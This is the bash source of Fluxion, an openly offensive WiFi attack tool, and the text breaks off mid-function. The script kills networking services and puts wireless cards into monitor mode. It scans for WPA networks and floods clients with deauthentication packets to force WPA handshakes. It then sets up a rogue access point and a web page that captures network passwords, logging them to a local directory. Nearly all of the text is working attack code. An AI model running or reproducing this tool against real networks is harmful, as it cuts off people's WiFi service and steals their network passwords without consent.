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#!/bin/bash ########## DEBUG Mode ########## if [ -z ${FLUX_DEBUG+x} ]; then FLUX_DEBUG=0 else FLUX_DEBUG=1 fi ################################ ####### preserve network ####### if [ -z ${KEEP_NETWORK+x} ]; then KEEP_NETWORK=0 else KEEP_NETWORK=1 fi ################################ ###### AUTO CONFIG SETUP ####### if [ -z ${FLUX_AUTO+x} ]; then FLUX_AUTO=0 else FLUX_AUTO=1 fi ################################ if [[ $EUID -ne 0 ]]; then echo -e "\e[1;31mYou don't have admin privilegies, execute the script as root.""\e[0m""" exit 1 fi if [ -z "${DISPLAY:-}" ]; then echo -e "\e[1;31mThe script should be exected inside a X (graphical) session.""\e[0m""" exit 1 fi clear ##################################### < CONFIGURATION > ##################################### DUMP_PATH="/tmp/TMPflux" HANDSHAKE_PATH="/root/handshakes" PASSLOG_PATH="/root/pwlog" WORK_DIR=`pwd` DEAUTHTIME="9999999999999" revision=9 version=2 IP= RANG_IP=$(echo $IP | cut -d "." -f 1,2,3) #Colors white="\033[1;37m" grey="\033[0;37m" purple="\033[0;35m" red="\033[1;31m" green="\033[1;32m" yellow="\033[1;33m" Purple="\033[0;35m" Cyan="\033[0;36m" Cafe="\033[0;33m" Fiuscha="\033[0;35m" blue="\033[1;34m" transparent="\e[0m" general_back="Back" general_error_1="Not_Found" general_case_error="Unknown option. Choose again" general_exitmode="Cleaning and closing" general_exitmode_1="Disabling monitoring interface" general_exitmode_2="Disabling interface" general_exitmode_3="Disabling "$grey"forwarding of packets" general_exitmode_4="Cleaning "$grey"iptables" general_exitmode_5="Restoring "$grey"tput" general_exitmode_6="Restarting "$grey"Network-Manager" general_exitmode_7="Cleanup performed successfully!" general_exitmode_8="Thanks for using fluxion" ############################################################################################# # DEBUG MODE = 0 ; DEBUG MODE = 1 [Normal Mode / Developer Mode] if [ $FLUX_DEBUG = 1 ]; then ## Developer Mode export flux_output_device=/dev/stdout HOLD="-hold" else ## Normal Mode export flux_output_device=/dev/null HOLD="" fi # Delete Log only in Normal Mode ! function conditional_clear() { if [[ "$flux_output_device" != "/dev/stdout" ]]; then clear; fi } function airmon { chmod +x lib/airmon/ } airmon # Check Updates function checkupdatess { revision_online="$(timeout -s SIGTERM 20 curl "" 2>/dev/null| grep "^revision" | cut -d "=" -f2)" if [ -z "$revision_online" ]; then echo "?">$DUMP_PATH/Irev else echo "$revision_online">$DUMP_PATH/Irev fi } # Animation function spinner { local pid=$1 local delay=0.15 local spinstr='|/-\' while [ "$(ps a | awk '{print $1}' | grep $pid)" ]; do local temp=${spinstr#?} printf " [%c] " "$spinstr" local spinstr=$temp${spinstr%"$temp"} sleep $delay printf "\b\b\b\b\b\b" done printf " \b\b\b\b" } # ERROR Report only in Developer Mode function err_report { echo "Error on line $1" } if [ $FLUX_DEBUG = 1 ]; then trap 'err_report $LINENUM' ERR fi #Function to executed in case of unexpected termination trap exitmode SIGINT SIGHUP source lib/ #Languages for the web interface source language/source # Design function top(){ conditional_clear echo -e "$red[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]" echo -e "$red[ ]" echo -e "$red[ $red FLUXION $version" "${yellow} ${red} < F""${yellow}luxion" "${red}I""${yellow}s" "${red}T""${yellow}he ""${red}F""${yellow}uture > " ${blue}" ]" echo -e "$blue[ ]" echo -e "$blue[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]""$transparent" echo echo } ############################################## < START > ############################################## # Check requirements function checkdependences { echo -ne "aircrack-ng....." if ! hash aircrack-ng 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "aireplay-ng....." if ! hash aireplay-ng 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "airmon-ng......." if ! hash airmon-ng 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "airodump-ng....." if ! hash airodump-ng 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "awk............." if ! hash awk 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "curl............" if ! hash curl 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "dhcpd..........." if ! hash dhcpd 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent" (isc-dhcp-server)" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "hostapd........." if ! hash hostapd 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "iwconfig........" if ! hash iwconfig 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "lighttpd........" if ! hash lighttpd 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "macchanger......" if ! hash macchanger 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "mdk3............" if ! hash mdk3 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "nmap............" if ! [ -f /usr/bin/nmap ]; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "php-cgi........." if ! [ -f /usr/bin/php-cgi ]; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "pyrit..........." if ! hash pyrit 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "python.........." if ! hash python 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "unzip..........." if ! hash unzip 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "xterm..........." if ! hash xterm 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "openssl........." if ! hash openssl 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "rfkill.........." if ! hash rfkill 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "strings........." if ! hash strings 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent" (binutils)" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "fuser..........." if ! hash fuser 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent" (psmisc)" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 if [ "$exit" = "1" ]; then exit 1 fi sleep 1 clear } top checkdependences # Create working directory if [ ! -d $DUMP_PATH ]; then mkdir -p $DUMP_PATH &>$flux_output_device fi # Create handshake directory if [ ! -d $HANDSHAKE_PATH ]; then mkdir -p $HANDSHAKE_PATH &>$flux_output_device fi #create password log directory if [ ! -d $PASSLOG_PATH ]; then mkdir -p $PASSLOG_PATH &>$flux_output_device fi if [ $FLUX_DEBUG != 1 ]; then clear; echo "" sleep 0.01 && echo -e "$red " sleep 0.01 && echo -e " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐ " sleep 0.01 && echo -e " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║ " sleep 0.01 && echo -e " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜ " sleep 0.01 && echo -e " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║ " sleep 0.01 && echo -e " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘ " sleep 0.01 && echo -e " ¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯ " echo"" sleep 0.1 echo -e $red" FLUXION "$white""$version" (rev. "$green "$revision"$white") "$yellow"by "$white" ghost" sleep 0.1 echo -e $green " Page:"$red" "$transparent sleep 0.1 echo -n " Latest rev." tput civis checkupdatess & spinner "$!" revision_online=$(cat $DUMP_PATH/Irev) echo -e ""$white" [${purple}${revision_online}$white"$transparent"]" if [ "$revision_online" != "?" ]; then if [ "$revision" -lt "$revision_online" ]; then echo echo echo -ne $red" New revision found! "$yellow echo -ne "Update? [Y/n]: "$transparent read -N1 doupdate echo -ne "$transparent" doupdate=${doupdate:-"Y"} if [ "$doupdate" = "Y" ]; then cp $0 $HOME/flux_rev-$revision.backup curl "" -s -o $0 echo echo echo -e ""$red"Updated successfully! Restarting the script to apply the changes ..."$transparent"" sleep 3 chmod +x $0 exec $0 exit fi fi fi echo "" tput cnorm sleep 1 fi # Show info for the selected AP function infoap { Host_MAC_info1=`echo $Host_MAC | awk 'BEGIN { FS = ":" } ; { print $1":"$2":"$3}' | tr [:upper:] [:lower:]` Host_MAC_MODEL=`macchanger -l | grep $Host_MAC_info1 | cut -d " " -f 5-` echo "INFO WIFI" echo echo -e " "$blue"SSID"$transparent" = $Host_SSID / $Host_ENC" echo -e " "$blue"Channel"$transparent" = $channel" echo -e " "$blue"Speed"$transparent" = ${speed:2} Mbps" echo -e " "$blue"BSSID"$transparent" = $mac (\e[1;33m$Host_MAC_MODEL $transparent)" echo } ############################################### < MENU > ############################################### # Windows + Resolution function setresolution { function resA { TOPLEFT="-geometry 90x13+0+0" TOPRIGHT="-geometry 83x26-0+0" BOTTOMLEFT="-geometry 90x24+0-0" BOTTOMRIGHT="-geometry 75x12-0-0" TOPLEFTBIG="-geometry 91x42+0+0" TOPRIGHTBIG="-geometry 83x26-0+0" } function resB { TOPLEFT="-geometry 92x14+0+0" TOPRIGHT="-geometry 68x25-0+0" BOTTOMLEFT="-geometry 92x36+0-0" BOTTOMRIGHT="-geometry 74x20-0-0" TOPLEFTBIG="-geometry 100x52+0+0" TOPRIGHTBIG="-geometry 74x30-0+0" } function resC { TOPLEFT="-geometry 100x20+0+0" TOPRIGHT="-geometry 109x20-0+0" BOTTOMLEFT="-geometry 100x30+0-0" BOTTOMRIGHT="-geometry 109x20-0-0" TOPLEFTBIG="-geometry 100x52+0+0" TOPRIGHTBIG="-geometry 109x30-0+0" } function resD { TOPLEFT="-geometry 110x35+0+0" TOPRIGHT="-geometry 99x40-0+0" BOTTOMLEFT="-geometry 110x35+0-0" BOTTOMRIGHT="-geometry 99x30-0-0" TOPLEFTBIG="-geometry 110x72+0+0" TOPRIGHTBIG="-geometry 99x40-0+0" } function resE { TOPLEFT="-geometry 130x43+0+0" TOPRIGHT="-geometry 68x25-0+0" BOTTOMLEFT="-geometry 130x40+0-0" BOTTOMRIGHT="-geometry 132x35-0-0" TOPLEFTBIG="-geometry 130x85+0+0" TOPRIGHTBIG="-geometry 132x48-0+0" } function resF { TOPLEFT="-geometry 100x17+0+0" TOPRIGHT="-geometry 90x27-0+0" BOTTOMLEFT="-geometry 100x30+0-0" BOTTOMRIGHT="-geometry 90x20-0-0" TOPLEFTBIG="-geometry 100x70+0+0" TOPRIGHTBIG="-geometry 90x27-0+0" } detectedresolution=$(xdpyinfo | grep -A 3 "screen #0" | grep dimensions | tr -s " " | cut -d" " -f 3) ## A) 1024x600 ## B) 1024x768 ## C) 1280x768 ## D) 1280x1024 ## E) 1600x1200 case $detectedresolution in "1024x600" ) resA ;; "1024x768" ) resB ;; "1280x768" ) resC ;; "1366x768" ) resC ;; "1280x1024" ) resD ;; "1600x1200" ) resE ;; "1366x768" ) resF ;; * ) resA ;; esac language; setinterface } function language { iptables-save > $DUMP_PATH/iptables-rules conditional_clear if [ "$FLUX_AUTO" = "1" ];then source $WORK_DIR/language/en; setinterface else while true; do conditional_clear top echo -e ""$red"["$yellow"2"$red"]"$transparent" Select your language" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" English " echo -e " "$red"["$yellow"2"$red"]"$transparent" German " echo -e " "$red"["$yellow"3"$red"]"$transparent" Romanian " echo -e " "$red"["$yellow"4"$red"]"$transparent" Turkish " echo -e " "$red"["$yellow"5"$red"]"$transparent" Spanish " echo -e " "$red"["$yellow"6"$red"]"$transparent" Chinese " echo -e " "$red"["$yellow"7"$red"]"$transparent" Italian " echo -e " "$red"["$yellow"8"$red"]"$transparent" Czech " echo -e " "$red"["$yellow"9"$red"]"$transparent" Greek " echo -e " "$red"["$yellow"10"$red"]"$transparent" French " echo -e " "$red"["$yellow"11"$red"]"$transparent" Slovenian " echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) source $WORK_DIR/language/en; break;; 2 ) source $WORK_DIR/language/ger; break;; 3 ) source $WORK_DIR/language/ro; break;; 4 ) source $WORK_DIR/language/tu; break;; 5 ) source $WORK_DIR/language/esp; break;; 6 ) source $WORK_DIR/language/ch; break;; 7 ) source $WORK_DIR/language/it; break;; 8 ) source $WORK_DIR/language/cz break;; 9 ) source $WORK_DIR/language/gr; break;; 10 ) source $WORK_DIR/language/fr; break;; 11 ) source $WORK_DIR/language/svn; break;; * ) echo "Unknown option. Please choose again"; conditional_clear ;; esac done fi } # Choose Interface function setinterface { conditional_clear top #unblock interfaces rfkill unblock all # Collect all interfaces in montitor mode & stop all KILLMONITOR=`iwconfig 2>&1 | grep Monitor | awk '{print $1}'` for monkill in ${KILLMONITOR[@]}; do airmon-ng stop $monkill >$flux_output_device echo -n "$monkill, " done # Create a variable with the list of physical network interfaces readarray -t wirelessifaces < <(./lib/airmon/ |grep "-" | cut -d- -f1) INTERFACESNUMBER=`./lib/airmon/ | grep -c "-"` if [ "$INTERFACESNUMBER" -gt "0" ]; then if [ "$INTERFACESNUMBER" -eq "1" ]; then PREWIFI=$(echo ${wirelessifaces[0]} | awk '{print $1}') else echo $header_setinterface echo i=0 for line in "${wirelessifaces[@]}"; do i=$(($i+1)) wirelessifaces[$i]=$line echo -e " "$red"["$yellow"$i"$red"]"$transparent" $line" done if [ "$FLUX_AUTO" = "1" ];then line="1" else echo echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read line fi PREWIFI=$(echo ${wirelessifaces[$line]} | awk '{print $1}') fi if [ $(echo "$PREWIFI" | wc -m) -le 3 ]; then conditional_clear top setinterface fi readarray -t naggysoftware < <(./lib/airmon/ check $PREWIFI | tail -n +8 | grep -v "on interface" | awk '{ print $2 }') WIFIDRIVER=$(./lib/airmon/ | grep "$PREWIFI" | awk '{print($(NF-2))}') if [ ! "$(echo $WIFIDRIVER | egrep 'rt2800|rt73')" ]; then rmmod -f "$WIFIDRIVER" &>$flux_output_device 2>&1 fi if [ $KEEP_NETWORK = 0 ]; then for nagger in "${naggysoftware[@]}"; do killall "$nagger" &>$flux_output_device done sleep 0.5 fi if [ ! "$(echo $WIFIDRIVER | egrep 'rt2800|rt73')" ]; then modprobe "$WIFIDRIVER" &>$flux_output_device 2>&1 sleep 0.5 fi # Select Wifi Interface select PREWIFI in $INTERFACES; do break; done WIFIMONITOR=$(./lib/airmon/ start $PREWIFI | grep "enabled on" | cut -d " " -f 5 | cut -d ")" -f 1) WIFI_MONITOR=$WIFIMONITOR WIFI=$PREWIFI #No wireless cards else echo $setinterface_error sleep 5 exitmode fi ghost } # Check files function ghost { conditional_clear CSVDB=dump-01.csv rm -rf $DUMP_PATH/* choosescan selection } # Select channel function choosescan { if [ "$FLUX_AUTO" = "1" ];then Scan else conditional_clear while true; do conditional_clear top echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_choosescan" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" $choosescan_option_1 " echo -e " "$red"["$yellow"2"$red"]"$transparent" $choosescan_option_2 " echo -e " "$red"["$yellow"3"$red"]"$red" $general_back " $transparent echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) Scan ; break ;; 2 ) Scanchan ; break ;; 3 ) setinterface; break;; * ) echo "Unknown option. Please choose again"; conditional_clear ;; esac done fi } # Choose your channel if you choose option 2 before function Scanchan { conditional_clear top echo " " echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_choosescan " echo " " echo -e " $scanchan_option_1 "$blue"6"$transparent" " echo -e " $scanchan_option_2 "$blue"1-5"$transparent" " echo -e " $scanchan_option_2 "$blue"1,2,5-7,11"$transparent" " echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read channel_number set -- ${channel_number} conditional_clear rm -rf $DUMP_PATH/dump* xterm $HOLD -title "$header_scanchan [$channel_number]" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e airodump-ng --encrypt WPA -w $DUMP_PATH/dump --channel "$channel_number" -a $WIFI_MONITOR --ignore-negative-one } # Scans the entire network function Scan { conditional_clear rm -rf $DUMP_PATH/dump* if [ "$FLUX_AUTO" = "1" ];then sleep 30 && killall xterm & fi xterm $HOLD -title "$header_scan" $TOPLEFTBIG -bg "#FFFFFF" -fg "#000000" -e airodump-ng --encrypt WPA -w $DUMP_PATH/dump -a $WIFI_MONITOR --ignore-negative-one } # Choose a network function selection { conditional_clear top LINEAS_WIFIS_CSV=`wc -l $DUMP_PATH/$CSVDB | awk '{print $1}'` if [ "$LINEAS_WIFIS_CSV" = "" ];then conditional_clear top echo -e ""$red"["$yellow"2"$red"]"$transparent" Error: your wireless card isn't supported " echo -n -e $transparent"Do you want exit? "$red"["$yellow"Y"$transparent"es / "$yellow"N"$transparent"o"$red"]"$transparent":" read back if [ $back = 'n' ] && [ $back = 'N' ] && [ $back = 'no' ] && [ $back = 'No' ];then clear && exitmode elif [ $back = 'y' ] && [ $back = 'Y' ] && [ $back = 'yes' ] && [ $back = 'Yes' ];then clear && setinterface fi fi if [ $LINEAS_WIFIS_CSV -le 3 ]; then ghost && break fi fluxionap=`cat $DUMP_PATH/$CSVDB | egrep -a -n '(Station|Cliente)' | awk -F : '{print $1}'` fluxionap=`expr $fluxionap - 1` head -n $fluxionap $DUMP_PATH/$CSVDB &> $DUMP_PATH/dump-02.csv tail -n +$fluxionap $DUMP_PATH/$CSVDB &> $DUMP_PATH/clientes.csv echo " WIFI LIST " echo "" echo " ID MAC CHAN SECU PWR ESSID" echo "" i=0 while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do longueur=${#MAC} PRIVACY=$(echo $PRIVACY| tr -d "^ ") PRIVACY=${PRIVACY:0:4} if [ $longueur -ge 17 ]; then i=$(($i+1)) POWER=`expr $POWER + 100` CLIENTE=`cat $DUMP_PATH/clientes.csv | grep $MAC` if [ "$CLIENTE" != "" ]; then CLIENTE="*" echo -e " "$red"["$yellow"$i"$red"]"$green"$CLIENTE\t""$red"$MAC"\t""$red "$CHANNEL"\t""$green" $PRIVACY"\t ""$red"$POWER%"\t""$red "$ESSID""$transparent"" else echo -e " "$red"["$yellow"$i"$red"]"$white"$CLIENTE\t""$yellow"$MAC"\t""$green "$CHANNEL"\t""$blue" $PRIVACY"\t ""$yellow"$POWER%"\t""$green "$ESSID""$transparent"" fi aidlength=$IDLENGTH assid[$i]=$ESSID achannel[$i]=$CHANNEL amac[$i]=$MAC aprivacy[$i]=$PRIVACY aspeed[$i]=$SPEED fi done < $DUMP_PATH/dump-02.csv # Select the first network if you select the first network if [ "$FLUX_AUTO" = "1" ];then choice=1 else echo echo -e ""$blue "("$white"*"$blue") $selection_1"$transparent"" echo "" echo -e " $selection_2" echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read choice fi if [[ $choice -eq "r" ]]; then ghost fi idlength=${aidlength[$choice]} ssid=${assid[$choice]} channel=$(echo ${achannel[$choice]}|tr -d [:space:]) mac=${amac[$choice]} privacy=${aprivacy[$choice]} speed=${aspeed[$choice]} Host_IDL=$idlength Host_SPEED=$speed Host_ENC=$privacy Host_MAC=$mac Host_CHAN=$channel acouper=${#ssid} fin=$(($acouper-idlength)) Host_SSID=${ssid:1:fin} Host_SSID2=`echo $Host_SSID | sed 's/ //g' | sed 's/\[//g;s/\]//g' | sed 's/\://g;s/\://g' | sed 's/\*//g;s/\*//g' | sed 's/(//g' | sed 's/)//g'` conditional_clear askAP } # FakeAP function askAP { DIGITOS_WIFIS_CSV=`echo "$Host_MAC" | wc -m` if [ $DIGITOS_WIFIS_CSV -le 15 ]; then selection && break fi if [ "$(echo $WIFIDRIVER | grep 8187)" ]; then fakeapmode="airbase-ng" askauth fi if [ "$FLUX_AUTO" = "1" ];then fakeapmode="hostapd"; authmode="handshake"; handshakelocation else top while true; do infoap echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_askAP" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" $askAP_option_1" echo -e " "$red"["$yellow"2"$red"]"$transparent" $askAP_option_2" echo -e " "$red"["$yellow"3"$red"]"$red" $general_back" $transparent echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) fakeapmode="hostapd"; authmode="handshake"; handshakelocation; break ;; 2 ) fakeapmode="airbase-ng"; askauth; break ;; 3 ) selection; break ;; * ) echo "$general_case_error"; conditional_clear ;; esac done fi } # Test Passwords / airbase-ng function askauth { if [ "$FLUX_AUTO" = "1" ];then authmode="handshake"; handshakelocation else conditional_clear top while true; do echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_askauth" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" $askauth_option_1" echo -e " "$red"["$yellow"2"$red"]"$transparent" $askauth_option_2" echo -e " "$red"["$yellow"3"$red"]"$red" $general_back" $transparent echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) authmode="handshake"; handshakelocation; break ;; 2 ) authmode="wpa_supplicant"; webinterface; break ;; 3 ) askAP; break ;; * ) echo "$general_case_error"; conditional_clear ;; esac done fi } function handshakelocation { conditional_clear top infoap if [ -f "/root/handshakes/$Host_SSID2-$Host_MAC.cap" ]; then echo -e "Handshake $yellow$Host_SSID-$Host_MAC.cap$transparent found in /root/handshakes." echo -e "${red}Do you want to use this file? (y/N)" echo -ne "$transparent" if [ "$FLUX_AUTO" = "0" ];then read usehandshakefile fi if [ "$usehandshakefile" = "y" -o "$usehandshakefile" = "Y" ]; then handshakeloc="/root/handshakes/$Host_SSID2-$Host_MAC.cap" fi fi if [ "$handshakeloc" = "" ]; then echo echo -e "handshake location (Example: $red$WORK_DIR.cap$transparent)" echo -e "Press ${yellow}ENTER$transparent to skip" echo echo -ne "Path: " if [ "$FLUX_AUTO" = "0" ];then read handshakeloc fi fi if [ "$handshakeloc" = "" ]; then deauthforce else if [ -f "$handshakeloc" ]; then pyrit -r "$handshakeloc" analyze &>$flux_output_device pyrit_broken=$? if [ $pyrit_broken = 0 ]; then Host_SSID_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d "(" -f2 | cut -d "'" -f2) Host_MAC_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d " " -f3 | tr '[:lower:]' '[:upper:]') else Host_SSID_loc=$(timeout -s SIGKILL 3 aircrack-ng "$handshakeloc" | grep WPA | grep '1 handshake' | awk '{print $3}') Host_MAC_loc=$(timeout -s SIGKILL 3 aircrack-ng "$handshakeloc" | grep WPA | grep '1 handshake' | awk '{print $2}') fi if [[ "$Host_MAC_loc" == *"$Host_MAC"* ]] && [[ "$Host_SSID_loc" == *"$Host_SSID"* ]]; then if [ $pyrit_broken = 0 ] && pyrit -r $handshakeloc analyze 2>&1 | sed -n /$(echo $Host_MAC | tr '[:upper:]' '[:lower:]')/,/^#/p | grep -vi "AccessPoint" | grep -qi "good,"; then cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap certssl else echo -e $yellow "Corrupted handshake" $transparent echo sleep 2 echo "Do you want to try aicrack-ng instead of pyrit to verify the handshake? [ENTER = NO]" echo read handshakeloc_aircrack echo -ne "$transparent" if [ "$handshakeloc_aircrack" = "" ]; then handshakelocation else if timeout -s SIGKILL 3 aircrack-ng $handshakeloc | grep -q "1 handshake"; then cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap certssl else echo "Corrupted handshake" sleep 2 handshakelocation fi fi fi else echo -e "${red}$general_error_1$transparent!" echo echo -e "File ${red}MAC$transparent" readarray -t lista_loc < <(pyrit -r $handshakeloc analyze 2>&1 | grep "^#") for i in "${lista_loc[@]}"; do echo -e "$green $(echo $i | cut -d " " -f1) $yellow$(echo $i | cut -d " " -f3 | tr '[:lower:]' '[:upper:]')$transparent ($green $(echo $i | cut -d "(" -f2 | cut -d "'" -f2)$transparent)" done echo -e "Host ${green}MAC$transparent" echo -e "$green #1: $yellow$Host_MAC$transparent ($green $Host_SSID$transparent)" sleep 7 handshakelocation fi else echo -e "File ${red}NOT$transparent present" sleep 2 handshakelocation fi fi } function deauthforce { if [ "$FLUX_AUTO" = "1" ];then handshakemode="normal"; askclientsel else conditional_clear top while true; do echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_deauthforce" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" pyrit" $transparent echo -e " "$red"["$yellow"2"$red"]"$transparent" $deauthforce_option_1" echo -e " "$red"["$yellow"3"$red"]"$red" $general_back" $transparent echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) handshakemode="normal"; askclientsel; break ;; 2 ) handshakemode="hard"; askclientsel; break ;; 3 ) askauth; break ;; * ) echo " $general_case_error"; conditional_clear ;; esac done fi } ############################################### < MENU > ############################################### ############################################# < HANDSHAKE > ############################################ # Type of deauthentication to be performed function askclientsel { if [ "$FLUX_AUTO" = "1" ];then deauth all else conditional_clear while true; do top echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_deauthMENU" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" Deauth all"$transparent echo -e " "$red"["$yellow"2"$red"]"$transparent" Deauth all [mdk3]" echo -e " "$red"["$yellow"3"$red"]"$transparent" Deauth target " echo -e " "$red"["$yellow"4"$red"]"$transparent" Rescan networks " echo -e " "$red"["$yellow"5"$red"]"$transparent" Exit" echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) deauth all; break ;; 2 ) deauth mdk3; break ;; 3 ) deauth esp; break ;; 4 ) killall airodump-ng &>$flux_output_device; ghost; break;; 5 ) exitmode; break ;; * ) echo " $general_case_error"; conditional_clear ;; esac done fi } # function deauth { conditional_clear iwconfig $WIFI_MONITOR channel $Host_CHAN case $1 in all ) DEAUTH=deauthall capture & $DEAUTH CSVDB=$Host_MAC-01.csv ;; mdk3 ) DEAUTH=deauthmdk3 capture & $DEAUTH & CSVDB=$Host_MAC-01.csv ;; esp ) DEAUTH=deauthesp HOST=`cat $DUMP_PATH/$CSVDB | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -v $Host_MAC` LINEAS_CLIENTES=`echo "$HOST" | wc -m | awk '{print $1}'` if [ $LINEAS_CLIENTES -le 5 ]; then DEAUTH=deauthall capture & $DEAUTH CSVDB=$Host_MAC-01.csv deauth fi capture for CLIENT in $HOST; do Client_MAC=`echo ${CLIENT:0:17}` deauthesp done $DEAUTH CSVDB=$Host_MAC-01.csv ;; esac deauthMENU } function deauthMENU { if [ "$FLUX_AUTO" = "1" ];then while true;do checkhandshake && sleep 5 done else while true; do conditional_clear clear top echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_deauthMENU " echo echo -e "Status handshake: $Handshake_statuscheck" echo echo -e " "$red"["$yellow"1"$red"]"$grey" $deauthMENU_option_1" echo -e " "$red"["$yellow"2"$red"]"$transparent" $general_back " echo -e " "$red"["$yellow"3"$red"]"$transparent" Select another network" echo -e " "$red"["$yellow"4"$red"]"$transparent" Exit" echo -n ' #> ' read yn case $yn in 1 ) checkhandshake;; 2 ) conditional_clear; killall xterm; askclientsel; 